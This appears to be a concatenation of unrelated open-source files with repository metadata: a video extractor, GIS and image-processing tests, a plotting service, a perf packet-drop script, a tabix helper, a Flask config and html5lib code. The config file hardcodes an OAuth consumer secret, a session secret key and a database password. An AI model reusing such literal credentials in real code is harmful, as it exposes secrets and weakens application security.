            'display_id': 'anime-awesome-chihiros-reise-ins-zauberland-das-beste-kommt-zum-schluss',
            'ext': 'mp4',
            'title': 'Anime Awesome: Chihiros Reise ins Zauberland – Das Beste kommt zum Schluss',
            'description': 'md5:afdf5862241aded4718a30dff6a57baf',
            'thumbnail': r're:^https?://.*\.jpg$',
            'duration': 578,
            'timestamp': 1414749706,
            'upload_date': '20141031',
            'uploader': 'Robin Schweiger',
            'view_count': int,
        },
    }, {
        'url': 'http://www.giga.de/games/channel/giga-top-montag/giga-topmontag-die-besten-serien-2014/',
        'only_matching': True,
    }, {
        'url': 'http://www.giga.de/extra/netzkultur/videos/giga-games-tom-mats-robin-werden-eigene-wege-gehen-eine-ankuendigung/',
        'only_matching': True,
    }, {
        'url': 'http://www.giga.de/tv/jonas-liest-spieletitel-eingedeutscht-episode-2/',
        'only_matching': True,
    }]
    def _real_extract(self, url):
        display_id = self._match_id(url)
        webpage = self._download_webpage(url, display_id)
        # the numeric id appears either as a data attribute or inside the
        # jwplayer API fragment
        video_id = self._search_regex(
            [r'data-video-id="(\d+)"', r'/api/video/jwplayer/#v=(\d+)'],
            webpage, 'video id')
        # playlist JSON: index 0 holds a dict of numbered format entries
        playlist = self._download_json(
            'http://www.giga.de/api/syndication/video/video_id/%s/playlist.json?content=syndication/key/368b5f151da4ae05ced7fa296bdff65a/'
            % video_id, video_id)[0]
        quality = qualities(['normal', 'hd720'])
        formats = []
        # formats are keyed "0", "1", ... — walk until the first gap
        for format_id in itertools.count(0):
            fmt = playlist.get(compat_str(format_id))
            if not fmt:
                break
            formats.append({
                'url': fmt['src'],
                'format_id': '%s-%s' % (fmt['quality'], fmt['type'].split('/')[-1]),
                'quality': quality(fmt['quality']),
            })
        self._sort_formats(formats)
        title = self._html_search_meta(
            'title', webpage, 'title', fatal=True)
        description = self._html_search_meta(
            'description', webpage, 'description')
        thumbnail = self._og_search_thumbnail(webpage)
        duration = parse_duration(self._search_regex(
            r'(?s)(?:data-video-id="{0}"|data-video="[^"]*/api/video/jwplayer/#v={0}[^"]*")[^>]*>.+?<span class="duration">([^<]+)</span>'.format(video_id),
            webpage, 'duration', fatal=False))
        timestamp = parse_iso8601(self._search_regex(
            r'datetime="([^"]+)"', webpage, 'upload date', fatal=False))
        uploader = self._search_regex(
            r'class="author">([^<]+)</a>', webpage, 'uploader', fatal=False)
        view_count = str_to_int(self._search_regex(
            r'<span class="views"><strong>([\d.,]+)</strong>',
            webpage, 'view count', fatal=False))
        return {
            'id': video_id,
            'display_id': display_id,
            'title': title,
            'description': description,
            'thumbnail': thumbnail,
            'duration': duration,
            'timestamp': timestamp,
            'uploader': uploader,
            'view_count': view_count,
            'formats': formats,
        }
| unlicense |
gioman/QGIS | tests/src/python/test_qgsissue7244.py | 2 | 4500 | # -*- coding: utf-8 -*-
"""QGIS Unit tests for QgsSpatialiteProvider
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = 'Vincent Mora'
__date__ = '09/07/2013'
__copyright__ = 'Copyright 2013, The QGIS Project'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import qgis # NOQA
import os
from qgis.core import QgsPoint, QgsVectorLayer
from qgis.testing import start_app, unittest
from qgis.utils import spatialite_connect
# Convenience instances in case you may need them
# Initialise the QGIS application once for the whole test module.
start_app()
def die(error_message):
    """Abort the current test by raising *error_message* as an Exception."""
    failure = Exception(error_message)
    raise failure
class TestQgsSpatialiteProvider(unittest.TestCase):
    """Regression tests for issue #7244: splitting (multi)polygon features
    stored in a Spatialite layer."""
    @classmethod
    def setUpClass(cls):
        """Run before all tests"""
        # create test db
        if os.path.exists("test.sqlite"):
            os.remove("test.sqlite")
        con = spatialite_connect("test.sqlite", isolation_level=None)
        cur = con.cursor()
        cur.execute("BEGIN")
        sql = "SELECT InitSpatialMetadata()"
        cur.execute(sql)
        # simple table with primary key
        sql = "CREATE TABLE test_mpg (id SERIAL PRIMARY KEY, name STRING NOT NULL)"
        cur.execute(sql)
        sql = "SELECT AddGeometryColumn('test_mpg', 'geometry', 4326, 'MULTIPOLYGON', 'XY')"
        cur.execute(sql)
        # build a multipolygon of 2x2 unit squares anchored at even coords
        sql = "INSERT INTO test_mpg (name, geometry) "
        sql += "VALUES ('multipolygon with 8 squares', GeomFromText('MULTIPOLYGON("
        for i in range(0, 4, 2):
            for j in range(0, 4, 2):
                sql += "(("
                sql += str(i) + " " + str(j) + ","
                sql += str(i + 1) + " " + str(j) + ","
                sql += str(i + 1) + " " + str(j + 1) + ","
                sql += str(i) + " " + str(j + 1) + ","
                sql += str(i) + " " + str(j)
                sql += ")),"
        sql = sql[:-1]  # remove last comma
        sql += ")', 4326))"
        cur.execute(sql)
        sql = "CREATE TABLE test_pg (id SERIAL PRIMARY KEY, name STRING NOT NULL)"
        cur.execute(sql)
        sql = "SELECT AddGeometryColumn('test_pg', 'geometry', 4326, 'POLYGON', 'XY')"
        cur.execute(sql)
        sql = "INSERT INTO test_pg (name, geometry) "
        sql += "VALUES ('polygon with interior ring', GeomFromText('POLYGON((0 0,3 0,3 3,0 3,0 0),(1 1,1 2,2 2,2 1,1 1))', 4326))"
        cur.execute(sql)
        cur.execute("COMMIT")
        con.close()
    @classmethod
    def tearDownClass(cls):
        """Run after all tests"""
        # for the time being, keep the file to check with qgis
        # if os.path.exists("test.sqlite") :
        # os.remove("test.sqlite")
        pass
    def setUp(self):
        """Run before each test."""
        pass
    def tearDown(self):
        """Run after each test."""
        pass
    def test_SplitMultipolygon(self):
        """Split multipolygon"""
        layer = QgsVectorLayer("dbname=test.sqlite table=test_mpg (geometry)", "test_mpg", "spatialite")
        assert(layer.isValid())
        assert(layer.hasGeometryType())
        # NOTE: the 'expr or die(...)' pattern below aborts via die() when
        # the left-hand check is falsy
        layer.featureCount() == 1 or die("wrong number of features")
        layer.startEditing()
        layer.splitFeatures([QgsPoint(0.5, -0.5), QgsPoint(0.5, 1.5)], 0) == 0 or die("error in split of one polygon of multipolygon")
        layer.splitFeatures([QgsPoint(2.5, -0.5), QgsPoint(2.5, 4)], 0) == 0 or die("error in split of two polygons of multipolygon at a time")
        layer.commitChanges() or die("this commit should work")
        layer.featureCount() == 7 or die("wrong number of features after 2 split")
    def test_SplitTruToCreateCutEdge(self):
        """Try to creat a cut edge"""
        layer = QgsVectorLayer("dbname=test.sqlite table=test_pg (geometry)", "test_pg", "spatialite")
        assert(layer.isValid())
        assert(layer.hasGeometryType())
        layer.featureCount() == 1 or die("wrong number of features")
        layer.startEditing()
        layer.splitFeatures([QgsPoint(1.5, -0.5), QgsPoint(1.5, 1.5)], 0) == 0 or die("error when trying to create an invalid polygon in split")
        layer.commitChanges() or die("this commit should work")
        layer.featureCount() == 1 or die("wrong number of features, polygon should be unafected by cut")
# Allow running this test module directly as a script.
if __name__ == '__main__':
    unittest.main()
| gpl-2.0 |
youprofit/scikit-image | skimage/util/tests/test_unique_rows.py | 38 | 1127 | import numpy as np
from numpy.testing import assert_equal, assert_raises
from skimage.util import unique_rows
def test_discontiguous_array():
    """unique_rows must handle non-contiguous (strided) input views."""
    base = np.array([[1, 0, 1], [0, 1, 0], [1, 0, 1]], np.uint8)
    strided_view = base[::2]
    expected = np.array([[1, 0, 1]], np.uint8)
    assert_equal(unique_rows(strided_view), expected)
def test_uint8_array():
    """unique_rows returns the sorted unique rows of a uint8 array."""
    arr = np.array([[1, 0, 1], [0, 1, 0], [1, 0, 1]], np.uint8)
    expected = np.array([[0, 1, 0], [1, 0, 1]], np.uint8)
    assert_equal(unique_rows(arr), expected)
def test_float_array():
    """unique_rows on a float array returns the sorted unique rows."""
    # np.float was a deprecated alias of the builtin float and was removed
    # in NumPy 1.24; the builtin is the exact equivalent.
    ar = np.array([[1.1, 0.0, 1.1], [0.0, 1.1, 0.0], [1.1, 0.0, 1.1]],
                  float)
    ar_out = unique_rows(ar)
    desired_ar_out = np.array([[0.0, 1.1, 0.0], [1.1, 0.0, 1.1]], float)
    assert_equal(ar_out, desired_ar_out)
def test_1d_array():
    """A 1-D input is rejected with ValueError."""
    vec = np.array([1, 0, 1, 1], np.uint8)
    assert_raises(ValueError, unique_rows, vec)
def test_3d_array():
    """An input with more than two dimensions is rejected with ValueError."""
    cube = np.arange(8).reshape((2, 2, 2))
    assert_raises(ValueError, unique_rows, cube)
# Allow running this test module directly as a script.
if __name__ == '__main__':
    np.testing.run_module_suite()
| bsd-3-clause |
chaen/DIRAC | FrameworkSystem/Service/PlottingHandler.py | 2 | 2384 | """ Plotting Service generates graphs according to the client specifications
and data
"""
__RCSID__ = "$Id$"
import os
import hashlib
from DIRAC import S_OK, S_ERROR, rootPath, gConfig, gLogger
from DIRAC.FrameworkSystem.Client.MonitoringClient import gMonitor
from DIRAC.ConfigurationSystem.Client import PathFinder
from DIRAC.Core.DISET.RequestHandler import RequestHandler
from DIRAC.FrameworkSystem.Service.PlotCache import gPlotCache
def initializePlottingHandler(serviceInfo):
  """Service initialization: resolve and validate the directory where plot
  images are stored, point the plot cache at it and register monitoring.

  :param serviceInfo: standard DISET service information dictionary
  :return: S_OK() on success, S_ERROR if the data location is not writable
  """
  # Get data location
  plottingSection = PathFinder.getServiceSection("Framework/Plotting")
  dataPath = gConfig.getValue("%s/DataLocation" % plottingSection, "data/graphs")
  dataPath = dataPath.strip()
  # startswith avoids the IndexError that dataPath[0] raised on an empty
  # configured value; relative paths are anchored at the instance path
  if not dataPath.startswith("/"):
    dataPath = os.path.realpath("%s/%s" % (gConfig.getValue('/LocalSite/InstancePath', rootPath), dataPath))
  gLogger.info("Data will be written into %s" % dataPath)
  try:
    os.makedirs(dataPath)
  except OSError:
    # directory already exists (or cannot be created; the write probe
    # below catches a genuinely unusable location)
    pass
  try:
    # probe that the directory is writable; the Python-2-only 'file'
    # builtin is replaced by 'open', which works on both 2 and 3
    testFile = "%s/plot__.test" % dataPath
    fd = open(testFile, "w")
    fd.close()
    os.unlink(testFile)
  except IOError:
    gLogger.fatal("Can't write to %s" % dataPath)
    return S_ERROR("Data location is not writable")
  gPlotCache.setPlotsLocation(dataPath)
  gMonitor.registerActivity("plotsDrawn", "Drawn plot images", "Plotting requests", "plots", gMonitor.OP_SUM)
  return S_OK()
class PlottingHandler(RequestHandler):
  """DISET request handler that renders plots and serves the image data."""
  def __calculatePlotHash(self, data, metadata, subplotMetadata):
    # the md5 of (data + all metadata) identifies a plot in the cache
    m = hashlib.md5()
    m.update(repr({'Data': data, 'PlotMetadata': metadata, 'SubplotMetadata': subplotMetadata}))
    return m.hexdigest()
  # DISET type signature for export_generatePlot arguments
  types_generatePlot = [[dict, list], dict]
  def export_generatePlot(self, data, plotMetadata, subplotMetadata={}):
    """ Create a plot according to the client specification and return its name
    """
    # NOTE(review): mutable default argument; harmless only while nothing
    # mutates subplotMetadata — confirm.
    plotHash = self.__calculatePlotHash(data, plotMetadata, subplotMetadata)
    result = gPlotCache.getPlot(plotHash, data, plotMetadata, subplotMetadata)
    if not result['OK']:
      return result
    return S_OK(result['Value']['plot'])
  def transfer_toClient(self, fileId, token, fileHelper):
    """
    Get graphs data
    """
    retVal = gPlotCache.getPlotData(fileId)
    if not retVal['OK']:
      return retVal
    retVal = fileHelper.sendData(retVal['Value'])
    if not retVal['OK']:
      return retVal
    fileHelper.sendEOF()
    return S_OK()
| gpl-3.0 |
Pantech-Discover/android_kernel_pantech_magnus | tools/perf/scripts/python/net_dropmonitor.py | 4235 | 1554 | # Monitor the system for dropped packets and proudce a report of drop locations and counts
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import *
# drop location (address as string) -> number of dropped packets seen there
drop_log = {}
# list of {'loc': address, 'name': symbol} entries from /proc/kallsyms
kallsyms = []
def get_kallsyms_table():
	"""Load /proc/kallsyms into the global kallsyms list and sort it."""
	global kallsyms
	try:
		f = open("/proc/kallsyms", "r")
		# first pass only counts lines so a progress indicator can be shown
		linecount = 0
		for line in f:
			linecount = linecount+1
		f.seek(0)
	except:
		# no readable /proc/kallsyms: symbol resolution stays disabled
		return
	j = 0
	for line in f:
		loc = int(line.split()[0], 16)
		name = line.split()[2]
		j = j +1
		if ((j % 100) == 0):
			print "\r" + str(j) + "/" + str(linecount),
		kallsyms.append({ 'loc': loc, 'name' : name})
	print "\r" + str(j) + "/" + str(linecount)
	# NOTE(review): sorting a list of dicts relies on Python 2 dict
	# comparison (here it effectively orders by 'loc') — confirm before
	# porting this script to Python 3.
	kallsyms.sort()
	return
def get_sym(sloc):
	"""Map an address to (symbol name, offset) using the kallsyms table.

	The containing symbol is the last entry whose start address is <= the
	target address.  The previous scan returned the first entry with
	loc >= target, i.e. the *next* symbol, so drops were attributed to the
	wrong function.  Returns (None, 0) when no symbol is at or below loc.
	"""
	loc = int(sloc)
	# kallsyms is sorted ascending by address; walk from the top down
	for sym in reversed(kallsyms):
		if loc >= sym['loc']:
			return (sym['name'], loc - sym['loc'])
	return (None, 0)
def print_drop_table():
	"""Print one report line per drop location: symbol, offset, count."""
	print "%25s %25s %25s" % ("LOCATION", "OFFSET", "COUNT")
	for i in drop_log.keys():
		(sym, off) = get_sym(i)
		if sym == None:
			# unresolvable address: fall back to the raw location string
			sym = i
		print "%25s %25s %25s" % (sym, off, drop_log[i])
def trace_begin():
	"""Called by perf before event processing starts."""
	print "Starting trace (Ctrl-C to dump results)"
def trace_end():
	"""Called by perf after the last event: resolve symbols and report."""
	print "Gathering kallsyms data"
	get_kallsyms_table()
	print_drop_table()
# called from perf, when it finds a corresponding skb:kfree_skb event
def skb__kfree_skb(name, context, cpu, sec, nsec, pid, comm,
		skbaddr, protocol, location):
	"""Count one packet drop against the kernel address in *location*."""
	slocation = str(location)
	try:
		drop_log[slocation] = drop_log[slocation] + 1
	except:
		# first drop seen at this location
		drop_log[slocation] = 1
| gpl-2.0 |
moonso/filter_variants | filter_variants/utils/get_tabix_handle.py | 1 | 2449 | import os
import logging
import tabix
from filter_variants.warnings import (NotZippedError, NotIndexedError)
from . import bgzip_file, index_file
logger = logging.getLogger(__name__)
def get_tabix_handle(file_path):
    """Return a Tabix vcf handle

    Check if vcf file is bgzipped and tabix indexed properly.
    If not try to bgzip and or index the file.

    Args:
        file_path(str)

    Returns:
        file_handle(Tabix handle)

    Raises:
        OSError: if bgzip (or tabix, on the bgzip recovery path) is not
            installed on the system
    """
    # 'sys' is not imported at module level, so the sys.exit(1) below used
    # to raise NameError instead of exiting; import it locally here.
    import sys
    try:
        file_handle = open_tabix_file(file_path)
    except NotZippedError as e:
        logger.warning(e.message)
        logger.info("Trying to bgzip file {0}".format(file_path))
        try:
            bgzip_file(file_path)
            file_path += '.gz'
        except OSError as e:
            raise OSError("Bgzip does not seem to be installed on your"\
            " system")
        try:
            logger.info("Trying to create index for file {0}".format(file_path))
            index_file(file_path)
        except OSError as e:
            logger.critical("Tabix does not seem to be installed on your"\
            " system")
            logger.info("Please install tabix")
            logger.info("Exiting")
            sys.exit(1)
        file_handle = open_tabix_file(file_path)
    except NotIndexedError as e:
        logger.warning(e.message)
        logger.info("Trying to create index for file {0}".format(
            file_path))
        try:
            index_file(file_path)
        except OSError as e:
            raise OSError("tabix does not seem to be installed on your"\
            " system")
        file_handle = open_tabix_file(file_path)
    return file_handle
def open_tabix_file(file_path):
    """Open *file_path* with tabix and probe that it is queryable.

    If the probe query fails, the file extension decides whether a
    NotZippedError (no .gz suffix) or NotIndexedError (.gz but no usable
    index) is raised.
    """
    file_handle = tabix.open(file_path)
    try:
        file_handle.query('1', 1, 100)
    except tabix.TabixError as e:
        # NOTE(review): a correctly indexed file that simply lacks contig
        # '1' may also raise TabixError here — confirm against pytabix.
        logger.warning("Something wrong with tabix file: {0}".format(
            file_path))
        file_name, file_extension = os.path.splitext(file_path)
        if file_extension != '.gz':
            raise NotZippedError("File {0} does not seem to be bgzipped".format(
                file_path))
        else:
            raise NotIndexedError("File {0} does not seem to be tabix"\
                " indexed".format(file_path))
    return file_handle
| mit |
bubanoid/cit_presentation | config.py | 1 | 2979 | import os
def database_uri(host, username, password, db_name):
    """Return a SQLAlchemy PostgreSQL (psycopg2) connection URI."""
    template = 'postgresql+psycopg2://{username}:{password}@{host}/{db_name}'
    return template.format(host=host, username=username,
                           password=password, db_name=db_name)
class Config(object):
    """Base configuration shared by all environments; subclasses override
    the database credentials and environment-specific flags."""
    # Statement for enabling the development environment
    DEBUG = False
    TESTING = False
    # Application threads. A common general assumption is
    # using 2 per available processor cores - to handle
    # incoming requests using one and performing background
    # operations using the other.
    THREADS_PER_PAGE = 2
    # Define the application directory
    BASE_DIR = os.path.abspath(os.path.dirname(__file__))
    UPLOAD_FOLDER = os.path.join(BASE_DIR, 'media')
    SQLALCHEMY_COMMIT_ON_TEARDOWN = True
    DATABASE_CONNECT_OPTIONS = {}
    # Enable protection against *Cross-site Request Forgery (CSRF)*
    CSRF_ENABLED = True
    # Default database credentials (overridden per environment)
    host = 'localhost'
    username = 'cituser'
    password = 'citpasswd'
class ProductionDevelopmentConfig(Config):
    """Configuration for OpenShift deployments.

    Every setting falls back to the base Config value (or a hard-coded
    default) when the corresponding OPENSHIFT_* environment variable is
    unset, so the same class also serves local development.
    """
    #Define database connection parameters
    host = os.getenv('OPENSHIFT_POSTGRESQL_DB_HOST', Config.host)
    username = os.getenv('OPENSHIFT_POSTGRESQL_DB_USERNAME', Config.username)
    password = os.getenv('OPENSHIFT_POSTGRESQL_DB_PASSWORD', Config.password)
    db_name = os.getenv('OPENSHIFT_APP_NAME', 'cit')
    # Define production database
    SQLALCHEMY_DATABASE_URI = \
        database_uri(host, username, password, db_name)
    # Use a secure, unique and absolutely secret key for
    # signing the data.
    CSRF_SESSION_KEY = os.getenv('OPENSHIFT_CSRF_SESSION_KEY', None)
    # Secret key for signing cookies
    SECRET_KEY = os.getenv('OPENSHIFT_SECRET_KEY', 'jd&%G#43WG~dn6')
    SITE_TITLE = os.getenv('OPENSHIFT_SITE_TITLE', 'Hi, Developer :)')
    # Facebook settings
    CONSUMER_KEY = os.getenv('OPENSHIFT_CONSUMER_KEY', '597071850435446')
    CONSUMER_SECRET = os.getenv('OPENSHIFT_CONSUMER_SECRET',
                                'c0e023b09461c502cd3cd7121d205735')
    # 'in os.environ' is the idiomatic membership test; .keys() builds an
    # intermediate view/list for no benefit
    if 'OPENSHIFT_POSTGRESQL_DB_HOST' not in os.environ:
        # Statement for enabling the development environment
        DEBUG = True
        # Disable protection against *Cross-site Request Forgery (CSRF)*
        CSRF_ENABLED = False
class TestingConfig(Config):
    """Configuration used by the test suite: its own database, CSRF off."""
    # Statement for enabling the development environment
    DEBUG = True
    TESTING = True
    # Disable protection against *Cross-site Request Forgery (CSRF)*
    CSRF_ENABLED = False
    #Define database connection parameters
    db_name = 'cit_test'
    # Define the database - we are working with
    SQLALCHEMY_DATABASE_URI = \
        database_uri(Config.host, Config.username, Config.password, db_name)
    # Secret key for signing cookies
    SECRET_KEY = "jd&%G#43WG~dn6"
    SITE_TITLE = "TEST"
    # Facebook settings
    CONSUMER_KEY = '597071850435446'
    CONSUMER_SECRET = 'c0e023b09461c502cd3cd7121d205735'
| gpl-3.0 |
ramaganapathy1/AMuDA-Ir-back-end | vEnv/lib/python2.7/site-packages/pip/_vendor/html5lib/_inputstream.py | 328 | 32532 | from __future__ import absolute_import, division, unicode_literals
from pip._vendor.six import text_type, binary_type
from pip._vendor.six.moves import http_client, urllib
import codecs
import re
from pip._vendor import webencodings
from .constants import EOF, spaceCharacters, asciiLetters, asciiUppercase
from .constants import ReparseException
from . import _utils
from io import StringIO
try:
from io import BytesIO
except ImportError:
BytesIO = StringIO
# Non-unicode versions of constants for use in the pre-parser
spaceCharactersBytes = frozenset([item.encode("ascii") for item in spaceCharacters])
asciiLettersBytes = frozenset([item.encode("ascii") for item in asciiLetters])
asciiUppercaseBytes = frozenset([item.encode("ascii") for item in asciiUppercase])
spacesAngleBrackets = spaceCharactersBytes | frozenset([b">", b"<"])
# Character class matching code points reported as "invalid-codepoint",
# excluding the surrogate range U+D800-U+DFFF, which is appended below only
# on platforms that can represent lone surrogates.
invalid_unicode_no_surrogate = "[\u0001-\u0008\u000B\u000E-\u001F\u007F-\u009F\uFDD0-\uFDEF\uFFFE\uFFFF\U0001FFFE\U0001FFFF\U0002FFFE\U0002FFFF\U0003FFFE\U0003FFFF\U0004FFFE\U0004FFFF\U0005FFFE\U0005FFFF\U0006FFFE\U0006FFFF\U0007FFFE\U0007FFFF\U0008FFFE\U0008FFFF\U0009FFFE\U0009FFFF\U000AFFFE\U000AFFFF\U000BFFFE\U000BFFFF\U000CFFFE\U000CFFFF\U000DFFFE\U000DFFFF\U000EFFFE\U000EFFFF\U000FFFFE\U000FFFFF\U0010FFFE\U0010FFFF]"  # noqa
if _utils.supports_lone_surrogates:
    # Use one extra step of indirection and create surrogates with
    # eval. Not using this indirection would introduce an illegal
    # unicode literal on platforms not supporting such lone
    # surrogates.
    assert invalid_unicode_no_surrogate[-1] == "]" and invalid_unicode_no_surrogate.count("]") == 1
    invalid_unicode_re = re.compile(invalid_unicode_no_surrogate[:-1] +
                                    eval('"\\uD800-\\uDFFF"') +  # pylint:disable=eval-used
                                    "]")
else:
    invalid_unicode_re = re.compile(invalid_unicode_no_surrogate)
# Non-BMP noncharacter code points, checked individually by
# characterErrorsUCS2 after decoding a surrogate pair.
non_bmp_invalid_codepoints = set([0x1FFFE, 0x1FFFF, 0x2FFFE, 0x2FFFF, 0x3FFFE,
                                  0x3FFFF, 0x4FFFE, 0x4FFFF, 0x5FFFE, 0x5FFFF,
                                  0x6FFFE, 0x6FFFF, 0x7FFFE, 0x7FFFF, 0x8FFFE,
                                  0x8FFFF, 0x9FFFE, 0x9FFFF, 0xAFFFE, 0xAFFFF,
                                  0xBFFFE, 0xBFFFF, 0xCFFFE, 0xCFFFF, 0xDFFFE,
                                  0xDFFFF, 0xEFFFE, 0xEFFFF, 0xFFFFE, 0xFFFFF,
                                  0x10FFFE, 0x10FFFF])
ascii_punctuation_re = re.compile("[\u0009-\u000D\u0020-\u002F\u003A-\u0040\u005B-\u0060\u007B-\u007E]")
# Cache for charsUntil()
charsUntilRegEx = {}
class BufferedStream(object):
    """Buffering for streams that do not have buffering of their own

    The buffer is implemented as a list of chunks on the assumption that
    joining many strings will be slow since it is O(n**2)
    """
    def __init__(self, stream):
        self.stream = stream
        self.buffer = []
        self.position = [-1, 0]  # chunk number, offset
    def tell(self):
        # absolute position = sum of fully consumed chunks + offset within
        # the current chunk
        pos = 0
        for chunk in self.buffer[:self.position[0]]:
            pos += len(chunk)
        pos += self.position[1]
        return pos
    def seek(self, pos):
        # only positions already read into the buffer can be sought to
        assert pos <= self._bufferedBytes()
        offset = pos
        i = 0
        while len(self.buffer[i]) < offset:
            offset -= len(self.buffer[i])
            i += 1
        self.position = [i, offset]
    def read(self, bytes):
        if not self.buffer:
            return self._readStream(bytes)
        elif (self.position[0] == len(self.buffer) and
              self.position[1] == len(self.buffer[-1])):
            # positioned at the end of the buffered data: go to the stream
            return self._readStream(bytes)
        else:
            return self._readFromBuffer(bytes)
    def _bufferedBytes(self):
        return sum([len(item) for item in self.buffer])
    def _readStream(self, bytes):
        # pull fresh data from the underlying stream and buffer it
        data = self.stream.read(bytes)
        self.buffer.append(data)
        self.position[0] += 1
        self.position[1] = len(data)
        return data
    def _readFromBuffer(self, bytes):
        # satisfy the read from buffered chunks first, then (if needed)
        # top up with a stream read
        remainingBytes = bytes
        rv = []
        bufferIndex = self.position[0]
        bufferOffset = self.position[1]
        while bufferIndex < len(self.buffer) and remainingBytes != 0:
            assert remainingBytes > 0
            bufferedData = self.buffer[bufferIndex]
            if remainingBytes <= len(bufferedData) - bufferOffset:
                bytesToRead = remainingBytes
                self.position = [bufferIndex, bufferOffset + bytesToRead]
            else:
                bytesToRead = len(bufferedData) - bufferOffset
                self.position = [bufferIndex, len(bufferedData)]
                bufferIndex += 1
            rv.append(bufferedData[bufferOffset:bufferOffset + bytesToRead])
            remainingBytes -= bytesToRead
            bufferOffset = 0
        if remainingBytes:
            rv.append(self._readStream(remainingBytes))
        return b"".join(rv)
def HTMLInputStream(source, **kwargs):
    """Dispatch to the unicode or binary input stream based on *source*."""
    # Work around Python bug #20007: read(0) closes the connection.
    # http://bugs.python.org/issue20007
    if (isinstance(source, http_client.HTTPResponse) or
        # Also check for addinfourl wrapping HTTPResponse
        (isinstance(source, urllib.response.addbase) and
         isinstance(source.fp, http_client.HTTPResponse))):
        isUnicode = False
    elif hasattr(source, "read"):
        # file-like object: sniff the type of a zero-length read
        isUnicode = isinstance(source.read(0), text_type)
    else:
        isUnicode = isinstance(source, text_type)
    if isUnicode:
        # encoding keywords make no sense for already-decoded input
        encodings = [x for x in kwargs if x.endswith("_encoding")]
        if encodings:
            raise TypeError("Cannot set an encoding with a unicode input, set %r" % encodings)
        return HTMLUnicodeInputStream(source, **kwargs)
    else:
        return HTMLBinaryInputStream(source, **kwargs)
class HTMLUnicodeInputStream(object):
"""Provides a unicode stream of characters to the HTMLTokenizer.
This class takes care of character encoding and removing or replacing
incorrect byte-sequences and also provides column and line tracking.
"""
_defaultChunkSize = 10240
def __init__(self, source):
"""Initialises the HTMLInputStream.
HTMLInputStream(source, [encoding]) -> Normalized stream from source
for use by html5lib.
source can be either a file-object, local filename or a string.
The optional encoding parameter must be a string that indicates
the encoding. If specified, that encoding will be used,
regardless of any BOM or later declaration (such as in a meta
element)
"""
if not _utils.supports_lone_surrogates:
# Such platforms will have already checked for such
# surrogate errors, so no need to do this checking.
self.reportCharacterErrors = None
elif len("\U0010FFFF") == 1:
self.reportCharacterErrors = self.characterErrorsUCS4
else:
self.reportCharacterErrors = self.characterErrorsUCS2
# List of where new lines occur
self.newLines = [0]
self.charEncoding = (lookupEncoding("utf-8"), "certain")
self.dataStream = self.openStream(source)
self.reset()
def reset(self):
self.chunk = ""
self.chunkSize = 0
self.chunkOffset = 0
self.errors = []
# number of (complete) lines in previous chunks
self.prevNumLines = 0
# number of columns in the last line of the previous chunk
self.prevNumCols = 0
# Deal with CR LF and surrogates split over chunk boundaries
self._bufferedCharacter = None
def openStream(self, source):
"""Produces a file object from source.
source can be either a file object, local filename or a string.
"""
# Already a file object
if hasattr(source, 'read'):
stream = source
else:
stream = StringIO(source)
return stream
def _position(self, offset):
chunk = self.chunk
nLines = chunk.count('\n', 0, offset)
positionLine = self.prevNumLines + nLines
lastLinePos = chunk.rfind('\n', 0, offset)
if lastLinePos == -1:
positionColumn = self.prevNumCols + offset
else:
positionColumn = offset - (lastLinePos + 1)
return (positionLine, positionColumn)
def position(self):
"""Returns (line, col) of the current position in the stream."""
line, col = self._position(self.chunkOffset)
return (line + 1, col)
def char(self):
""" Read one character from the stream or queue if available. Return
EOF when EOF is reached.
"""
# Read a new chunk from the input stream if necessary
if self.chunkOffset >= self.chunkSize:
if not self.readChunk():
return EOF
chunkOffset = self.chunkOffset
char = self.chunk[chunkOffset]
self.chunkOffset = chunkOffset + 1
return char
def readChunk(self, chunkSize=None):
if chunkSize is None:
chunkSize = self._defaultChunkSize
self.prevNumLines, self.prevNumCols = self._position(self.chunkSize)
self.chunk = ""
self.chunkSize = 0
self.chunkOffset = 0
data = self.dataStream.read(chunkSize)
# Deal with CR LF and surrogates broken across chunks
if self._bufferedCharacter:
data = self._bufferedCharacter + data
self._bufferedCharacter = None
elif not data:
# We have no more data, bye-bye stream
return False
if len(data) > 1:
lastv = ord(data[-1])
if lastv == 0x0D or 0xD800 <= lastv <= 0xDBFF:
self._bufferedCharacter = data[-1]
data = data[:-1]
if self.reportCharacterErrors:
self.reportCharacterErrors(data)
# Replace invalid characters
data = data.replace("\r\n", "\n")
data = data.replace("\r", "\n")
self.chunk = data
self.chunkSize = len(data)
return True
def characterErrorsUCS4(self, data):
for _ in range(len(invalid_unicode_re.findall(data))):
self.errors.append("invalid-codepoint")
def characterErrorsUCS2(self, data):
# Someone picked the wrong compile option
# You lose
skip = False
for match in invalid_unicode_re.finditer(data):
if skip:
continue
codepoint = ord(match.group())
pos = match.start()
# Pretty sure there should be endianness issues here
if _utils.isSurrogatePair(data[pos:pos + 2]):
# We have a surrogate pair!
char_val = _utils.surrogatePairToCodepoint(data[pos:pos + 2])
if char_val in non_bmp_invalid_codepoints:
self.errors.append("invalid-codepoint")
skip = True
elif (codepoint >= 0xD800 and codepoint <= 0xDFFF and
pos == len(data) - 1):
self.errors.append("invalid-codepoint")
else:
skip = False
self.errors.append("invalid-codepoint")
    def charsUntil(self, characters, opposite=False):
        """ Returns a string of characters from the stream up to but not
        including any character in 'characters' or EOF. 'characters' must be
        a container that supports the 'in' method and iteration over its
        characters.
        """
        # Use a cache of regexps to find the required characters
        try:
            chars = charsUntilRegEx[(characters, opposite)]
        except KeyError:
            # Build (and cache) a regex matching a run of the stop characters
            # (or, with opposite=True, a run of anything *but* them).
            if __debug__:
                for c in characters:
                    assert(ord(c) < 128)
            regex = "".join(["\\x%02x" % ord(c) for c in characters])
            if not opposite:
                regex = "^%s" % regex
            chars = charsUntilRegEx[(characters, opposite)] = re.compile("[%s]+" % regex)
        rv = []
        while True:
            # Find the longest matching prefix
            m = chars.match(self.chunk, self.chunkOffset)
            if m is None:
                # If nothing matched, and it wasn't because we ran out of chunk,
                # then stop
                if self.chunkOffset != self.chunkSize:
                    break
            else:
                end = m.end()
                # If not the whole chunk matched, return everything
                # up to the part that didn't match
                if end != self.chunkSize:
                    rv.append(self.chunk[self.chunkOffset:end])
                    self.chunkOffset = end
                    break
            # If the whole remainder of the chunk matched,
